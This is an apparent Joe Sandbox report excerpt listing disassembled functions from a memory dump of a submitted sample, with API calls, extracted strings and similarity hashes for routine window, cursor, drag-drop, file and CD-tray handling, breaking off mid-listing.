Function 0067AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0067AF18
_wcscmp.LIBCMT ref: 0067AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0067AF51
CharUpperBuffW.USER32(?,00000000), ref: 0067AF6E
_wcscmp.LIBCMT ref: 0067AF8C
_wcsstr.LIBCMT ref: 0067AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0067AFD5
_wcscmp.LIBCMT ref: 0067AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0067B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0067B055
_wcscmp.LIBCMT ref: 0067B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0067B08D
GetWindowRect.USER32(00000004,?), ref: 0067B0F6

Strings

ThumbnailClass, xrefs: 0067AFE0, 0067B060
@, xrefs: 0067AEF9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 8944ebbf69b54f158be1ae5b44a19e8dab31111a3d7b59d581a1780c210a5b49
Instruction ID: 587292414dd408f8e6abcb13479b9e83f000fe3276d5c1e29c0000624f851170
Opcode Fuzzy Hash: 8944ebbf69b54f158be1ae5b44a19e8dab31111a3d7b59d581a1780c210a5b49
Instruction Fuzzy Hash: 2E81C1711082059FDB04DF50C885FAA7BEAEF84314F04D56EFD898A291DB34DD49CBA2

Function 006AC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DragQueryPoint.SHELL32(?,?), ref: 006AC627

Part of subcall function 006AAB37: ClientToScreen.USER32(?,?), ref: 006AAB60
Part of subcall function 006AAB37: GetWindowRect.USER32(?,?), ref: 006AABD6
Part of subcall function 006AAB37: PtInRect.USER32(?,?,006AC014), ref: 006AABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 006AC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006AC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006AC6BE
_wcscat.LIBCMT ref: 006AC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 006AC705
SendMessageW.USER32(?,000000B0,?,?), ref: 006AC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 006AC735
SendMessageW.USER32(?,000000B1,?,?), ref: 006AC757
DragFinish.SHELL32(?), ref: 006AC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006AC851

Strings

@GUI_DROPID, xrefs: 006AC77E
pbn, xrefs: 006AC79B
@GUI_DRAGFILE, xrefs: 006AC800
@GUI_DRAGID, xrefs: 006AC7C9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbn
API String ID: 169749273-857808454
Opcode ID: 357e501c32c59fef677deee0507677b4be93fe6bbe1735ea01e57006c435a22e
Instruction ID: ccdab7b19303ff2898d43531e36a53e8efb80b241cfcbaad96540312aca76da2
Opcode Fuzzy Hash: 357e501c32c59fef677deee0507677b4be93fe6bbe1735ea01e57006c435a22e
Instruction Fuzzy Hash: D4617D71508310AFC701EF64DC85D9FBBEAEF8A710F00092EF591962A1DB30A949CF96

Function 0067ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0067AC33

Strings

ALL, xrefs: 0067ACC7
[REGEXPTITLE:, xrefs: 0067AC5B
LAST, xrefs: 0067ABF8
REGEXP=, xrefs: 0067AC48
[CLASS:, xrefs: 0067AC83
[ACTIVE, xrefs: 0067AC20
[HANDLE:, xrefs: 0067AC3F
[LAST, xrefs: 0067ACE0
CLASSNAME=, xrefs: 0067AC70
HANDLE=, xrefs: 0067AC2C
[ALL, xrefs: 0067ACD9
ACTIVE, xrefs: 0067AC0E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 3de0c8244c74b456e4785ae3effda505aba274a4ead538e56b8f054d4d3bc3bb
Instruction ID: b8eb79911bcb4fc8b30f58fd03983a035db9049cddc0ac396f083d5a3713db03
Opcode Fuzzy Hash: 3de0c8244c74b456e4785ae3effda505aba274a4ead538e56b8f054d4d3bc3bb
Instruction Fuzzy Hash: 1231C230E4861ABADB51EAA0EE03EEE7767AF10711F64401EF446712D1FF616F048A5B

Function 00694FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00695013
LoadCursorW.USER32(00000000,00007F00), ref: 0069501E
LoadCursorW.USER32(00000000,00007F03), ref: 00695029
LoadCursorW.USER32(00000000,00007F8B), ref: 00695034
LoadCursorW.USER32(00000000,00007F01), ref: 0069503F
LoadCursorW.USER32(00000000,00007F81), ref: 0069504A
LoadCursorW.USER32(00000000,00007F88), ref: 00695055
LoadCursorW.USER32(00000000,00007F80), ref: 00695060
LoadCursorW.USER32(00000000,00007F86), ref: 0069506B
LoadCursorW.USER32(00000000,00007F83), ref: 00695076
LoadCursorW.USER32(00000000,00007F85), ref: 00695081
LoadCursorW.USER32(00000000,00007F82), ref: 0069508C
LoadCursorW.USER32(00000000,00007F84), ref: 00695097
LoadCursorW.USER32(00000000,00007F04), ref: 006950A2
LoadCursorW.USER32(00000000,00007F02), ref: 006950AD
LoadCursorW.USER32(00000000,00007F89), ref: 006950B8
GetCursorInfo.USER32(?), ref: 006950C8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 123d73b30e2dfb84740e9ae5d5ecc1682688afc3009f0edd99706921e7ec4b68
Instruction ID: 9e77c4981d1d2e7a8766420fca91069e2585806cd4457d0134129019d9793961
Opcode Fuzzy Hash: 123d73b30e2dfb84740e9ae5d5ecc1682688afc3009f0edd99706921e7ec4b68
Instruction Fuzzy Hash: F93113B1D083196ADF109FB68C899AFBFEDFF04750F50452AE50DE7280DA78A5008FA5

Function 006AA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006AA259
DestroyWindow.USER32(?,?), ref: 006AA2D3

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006AA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006AA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006AA382
DestroyWindow.USER32(00000000), ref: 006AA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00620000,00000000), ref: 006AA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006AA3F4
GetDesktopWindow.USER32 ref: 006AA40D
GetWindowRect.USER32(00000000), ref: 006AA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006AA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006AA444

Part of subcall function 006225DB: GetWindowLongW.USER32(?,000000EB), ref: 006225EC

Strings

tooltips_class32, xrefs: 006AA346, 006AA3D4
0, xrefs: 006AA26F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 252e7da23da4eb17efdec5ed45587fdd1d2dd752a3c81323a2aef13c992a41ba
Instruction ID: cbde0a53cb5bad473d8672a7d9e1def299255aca30b6f6cc9c1d90014aad3a6e
Opcode Fuzzy Hash: 252e7da23da4eb17efdec5ed45587fdd1d2dd752a3c81323a2aef13c992a41ba
Instruction Fuzzy Hash: F1716A71140645AFDB21EF68CC49FAA7BE6FB8A304F04451EF9858B2A0D771AD02CF52

Function 006A4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006A4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006A446F

Strings

CHECK, xrefs: 006A448F
GETTEXT, xrefs: 006A45C2
EXPAND, xrefs: 006A4521
GETITEMCOUNT, xrefs: 006A4551
COLLAPSE, xrefs: 006A44B5
SELECT, xrefs: 006A4620
EXISTS, xrefs: 006A44D8
GETSELECTED, xrefs: 006A457F
GETTOTALCOUNT, xrefs: 006A4456
ISCHECKED, xrefs: 006A45F2
UNCHECK, xrefs: 006A464B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: f4d4f55dbac969b702ba864a5afe5b3672179155ddbb44e650dd7a0dfc4533c9
Instruction ID: ad2b2b4c83dad935e1147d3a21508e080d9aa25108ee7fbece67d86b75ec822f
Opcode Fuzzy Hash: f4d4f55dbac969b702ba864a5afe5b3672179155ddbb44e650dd7a0dfc4533c9
Instruction Fuzzy Hash: 28917C306047119BCB44EF20C851A6EB7E3AF96350F04886DF8965B3A2CB75ED46CF95

Function 006AB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006AB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006A91C2), ref: 006AB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006AB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006AB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006AB9C3
FreeLibrary.KERNEL32(?), ref: 006AB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006AB9DF
DestroyIcon.USER32(?,?,?,?,?,006A91C2), ref: 006AB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006ABA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006ABA17

Part of subcall function 00642EFD: __wcsicmp_l.LIBCMT ref: 00642F86

Strings

.exe, xrefs: 006AB84A
.icl, xrefs: 006AB82A
.dll, xrefs: 006AB86D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 13f7e06ad66ba0b63e9042d21ad89b06336ed236af735019cc10e7b81e44ac65
Instruction ID: 96d4688c03105df44174f29a27a2118ea263f7b3178f29a615799dfb0c644545
Opcode Fuzzy Hash: 13f7e06ad66ba0b63e9042d21ad89b06336ed236af735019cc10e7b81e44ac65
Instruction Fuzzy Hash: 8761FC71900219BAEB14EF64DC41BFF7BAAEF0A710F10451AF915D62C2DB74AD80DBA0

Function 0068DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0068DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 0068DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0068DCF8
__wsplitpath.LIBCMT ref: 0068DD56
_wcscat.LIBCMT ref: 0068DD6E
_wcscat.LIBCMT ref: 0068DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0068DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 0068DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 0068DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 0068DDFC
_wcscpy.LIBCMT ref: 0068DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0068DE47

Strings

*.*, xrefs: 0068DE02

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 34be47b74ff9e9abe323cbd99901c3709be9fef1a0bf0cb915fc696302b1e09a
Instruction ID: 8fd52049c30f01f2c2e33343dc4f8681da65b7117dc44e66bb460ef1bfbbef32
Opcode Fuzzy Hash: 34be47b74ff9e9abe323cbd99901c3709be9fef1a0bf0cb915fc696302b1e09a
Instruction Fuzzy Hash: F2618C725046059FCB50EF60D844AAEB3EAFF89310F044A2DF999C7291DB31E945CFA6

Function 00689C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00689C7F

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00689CA0
__swprintf.LIBCMT ref: 00689CF9
__swprintf.LIBCMT ref: 00689D12
_wprintf.LIBCMT ref: 00689DB9
_wprintf.LIBCMT ref: 00689DD7

Strings

Incorrect parameters to object property !, xrefs: 00689D5B
"%s" (%d) : ==> %s:%s%s, xrefs: 00689DB4
Error: , xrefs: 00689D81
Line %d (File "%s"):, xrefs: 00689CF3, 00689D0C
^ ERROR , xrefs: 00689D4E
"%s" (%d) : ==> %s:, xrefs: 00689DD2

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: bf7518fbc34f798274f5aa59e7e8e18156fe6e9e188dbd80d966fa55173bd1ff
Instruction ID: 73eede04b3f3786d037cbdb16af7c89be0b8536d923b6a7326816b5b9933a785
Opcode Fuzzy Hash: bf7518fbc34f798274f5aa59e7e8e18156fe6e9e188dbd80d966fa55173bd1ff
Instruction Fuzzy Hash: 47516F31900A1AAECF54FBE0DD86EEEB77AAF14300F100169B505721A1EB312F59DF69

Function 0068A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

CharLowerBuffW.USER32(?,?), ref: 0068A3CB
GetDriveTypeW.KERNEL32 ref: 0068A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068A4C5

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

Strings

set cd door , xrefs: 0068A466
open , xrefs: 0068A427
wait, xrefs: 0068A482
close cd wait, xrefs: 0068A4B0
type cdaudio alias cd wait, xrefs: 0068A443
closed, xrefs: 0068A3DF, 0068A3E8
close, xrefs: 0068A3D1
open, xrefs: 0068A3F2

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 7154dec74ac2cdbbbbac0c8f562e2f079777f25e7083638fbfd4449c093f83da
Instruction ID: ca2e52b2382ea7c0b8f2084b0051ce745cbdf01ae73a012d57599b934b4ccfb0
Opcode Fuzzy Hash: 7154dec74ac2cdbbbbac0c8f562e2f079777f25e7083638fbfd4449c093f83da
Instruction Fuzzy Hash: 21518C715047149FC740EF20D891C6AB3E6EF84318F14892EF88A572A1DB31ED0ACF96

Function 0067F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0065E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0067F8DF
LoadStringW.USER32(00000000,?,0065E029,00000001), ref: 0067F8E8

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0065E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0067F90A
LoadStringW.USER32(00000000,?,0065E029,00000001), ref: 0067F90D
__swprintf.LIBCMT ref: 0067F95D
__swprintf.LIBCMT ref: 0067F96E
_wprintf.LIBCMT ref: 0067FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0067FA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0067FA12
Error: , xrefs: 0067F9E5
Line %d (File "%s"):, xrefs: 0067F957
Line %d:, xrefs: 0067F968
^ ERROR, xrefs: 0067F9C3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 0bce9b6be165d3a1f676d5a99f3e6ac058cf0de7e61d9bae85ed52d4cdcc78bf
Instruction ID: 36068979dbe96b69a8e2347436465ad363ccc9faee2a390d9d7a0c344bb3a4cb
Opcode Fuzzy Hash: 0bce9b6be165d3a1f676d5a99f3e6ac058cf0de7e61d9bae85ed52d4cdcc78bf
Instruction Fuzzy Hash: 7F416F7290062DAACF54FFE0ED86DEEB77AAF14300F100469B50976192EA316F49CF65

Function 006ABA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006A9207,?,?), ref: 006ABA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006A9207,?,?,00000000,?), ref: 006ABA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006A9207,?,?,00000000,?), ref: 006ABA78
CloseHandle.KERNEL32(00000000,?,?,?,?,006A9207,?,?,00000000,?), ref: 006ABA85
GlobalLock.KERNEL32(00000000), ref: 006ABA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006A9207,?,?,00000000,?), ref: 006ABA9D
GlobalUnlock.KERNEL32(00000000), ref: 006ABAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,006A9207,?,?,00000000,?), ref: 006ABAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006A9207,?,?,00000000,?), ref: 006ABABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,006B2CAC,?), ref: 006ABAD7
GlobalFree.KERNEL32(00000000), ref: 006ABAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 006ABB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 006ABB36
DeleteObject.GDI32(00000000), ref: 006ABB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006ABB74

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: cd32321ce98bf225478041ab512c730687367a370a5969aabee280a20d61b4bc
Instruction ID: 6c24c911cd725fad8fc8634f755f3adef72146649ca5edef759830f61f5ecf23
Opcode Fuzzy Hash: cd32321ce98bf225478041ab512c730687367a370a5969aabee280a20d61b4bc
Instruction Fuzzy Hash: 44412B75600204EFDB11AFA5DC48EAA7BBAFF8A711F105068F905D7261D730AE41CF61

Function 0068D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0068DA10
_wcscat.LIBCMT ref: 0068DA28
_wcscat.LIBCMT ref: 0068DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0068DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0068DA63
GetFileAttributesW.KERNEL32(?), ref: 0068DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0068DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0068DAA7

Strings

*.*, xrefs: 0068DAE6

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
